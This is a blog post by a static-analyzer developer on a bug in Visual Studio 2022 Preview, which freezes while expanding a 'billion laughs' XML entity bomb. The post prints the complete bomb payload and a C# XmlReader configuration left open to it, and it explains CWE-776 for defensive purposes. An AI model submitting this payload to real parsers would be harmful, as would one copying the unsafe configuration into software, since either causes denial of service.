In April 2021 Microsoft announced a new version of its IDE – Visual Studio 2022 – while also announcing that the IDE would be 64-bit. We've been waiting for this for so long – no more 4 GB memory limitations! However, as it turned out, it's not all that simple...
By the way, if you missed it, here's a link to the announcement post.
But let's get to the matter in question. I reproduced this problem on the latest (available at the time of writing) Visual Studio 2022 version - 17.0.0 Preview 3.1.
To reproduce this, the following is sufficient:
After this, try to copy the following text to the XML file:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
<!ENTITY lol11
"&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;">
<!ENTITY lol12
"&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;">
<!ENTITY lol13
"&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;">
<!ENTITY lol14
"&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;">
<!ENTITY lol15
"&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;">
]>
<lolz>&lol15;</lolz>
Now go make yourself a cup of coffee, get back to your computer - and watch Visual Studio eat up more and more RAM.
You may have two questions:
Let's figure this out. To do this, we'll need to understand why processing XML files carelessly can be dangerous and what the PVS-Studio analyzer has to do with all this.
We continue to actively develop PVS-Studio as a SAST solution. If we talk about the C# analyzer, the main focus here is OWASP Top 10 2017 (that's the latest version available - we are looking forward to an update!) support. By the way, if you missed it, not too long ago we added the taint analysis feature. You can read about it here.
So, I created (or, to be exact, attempted to create) a sample project to test the analyzer. The fact is, one of the OWASP Top 10 categories we are developing diagnostic rules for, is A4:2017-XML External Entities (XXE). It has to do with incorrect XML file processing that makes applications vulnerable to attacks. What does incorrect processing mean? Often it's excessive trust to input data (a perpetual problem that causes many vulnerabilities) combined with XML parsers that lack sufficient limitations.
As a result, if the files are compromised, this may cause various unpleasant consequences. There are two main problems here: data disclosure and denial of service. Both have corresponding CWEs:
I'll leave CWE-611 for the other day. Today we need CWE-776.
I'll briefly describe the essence of the problem. If you'll want to know more, many resources on the internet will provide you with the information you need.
The XML standard assumes the use of DTD (document type definition). DTD enables you to use so-called XML entities.
The entity syntax is simple:
<!ENTITY myEntity "Entity value">
Then you can get the entity value as follows:
&myEntity;
The catch here is, entities can expand not only into strings (as in our case - "Entity value"), but also into sequences of other entities. For example:
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
As a result, when expanding the 'lol1' entity, we get a string that looks like this:
lollollollollollollollollollol
You can go further and define the 'lol2' entity by expanding it through 'lol1':
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
Then when expanding the 'lol2' entity, you get the following output:
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollol
How about going a level deeper and defining the 'lol3' entity?
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
Here's the output you get when expanding it:
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
....
The XML file we used at the beginning of the article was generated with the same principle. Now, I think you see where the "billion laughs" name comes from. So, it turns out, if the XML parser is configured incorrectly (DTD processing is enabled and maximum entity size is not limited) - nothing good happens when this 'bomb' is processed.
Talking about C#, vulnerable code is easiest to demonstrate with an XmlReader type example:
var pathToXmlBomb = @"D:\XMLBomb.xml";
XmlReaderSettings rs = new XmlReaderSettings()
{
DtdProcessing = DtdProcessing.Parse,
MaxCharactersFromEntities = 0
};
using var reader = XmlReader.Create(File.OpenRead(pathToXmlBomb), rs);
while (reader.Read())
{
if (reader.NodeType == XmlNodeType.Text)
Console.WriteLine(reader.Value);
}
If I configure my XmlReader this way, I am almost telling the intruder: "Come on, blow this up!".
There are two reasons for this:
By default, processing of DTD entities is forbidden: the DtdProcessing property is set to Prohibit. The maximum number of characters from entities is also limited (starting with .NET Framework 4.5.2). So in the modern .NET you have fewer and fewer opportunities to shoot yourself in the foot. This is still possible though - if you configure parsers incorrectly.
It seems that in Visual Studio 2022, when we copied our XML bomb, both conditions were true:
We examined the process to see what was happening. What we found confirmed our expectations.
The process list showed that the main thread was processing with the XML file. That caused GUI to freeze, and IDE did not respond to any attempts to revive it. with the XML file.
The VS Main thread's call stack showed that the thread was busy processing DTD (the ParseDtd method execution)
During the experiment I was wondering, why does Visual Studio run DTD processing at all? Why doesn't it display XML as-is? I got my answer when experimenting with a small XML bomb (same approach, lighter load).
It seems that the whole point is to display possible values of entities in the editor "on the fly".
Small values are processed successfully, but problems arise when XML entities start growing.
Of course, after my investigation, I had to write a bug report.
This is how we - unexpectedly - saw an XML bomb in action. It was very interesting to explore a real-life popular application and find something like this.
Just as I am writing this, we are developing a diagnostic to search for code that is vulnerable to XML file processing problems. We expect to release it with PVS-Studio 7.15. If you want to see what the analyzer can do right now, I encourage you to download it and try it on your project. ;)
As always, subscribe to my Twitter so as not to miss anything interesting.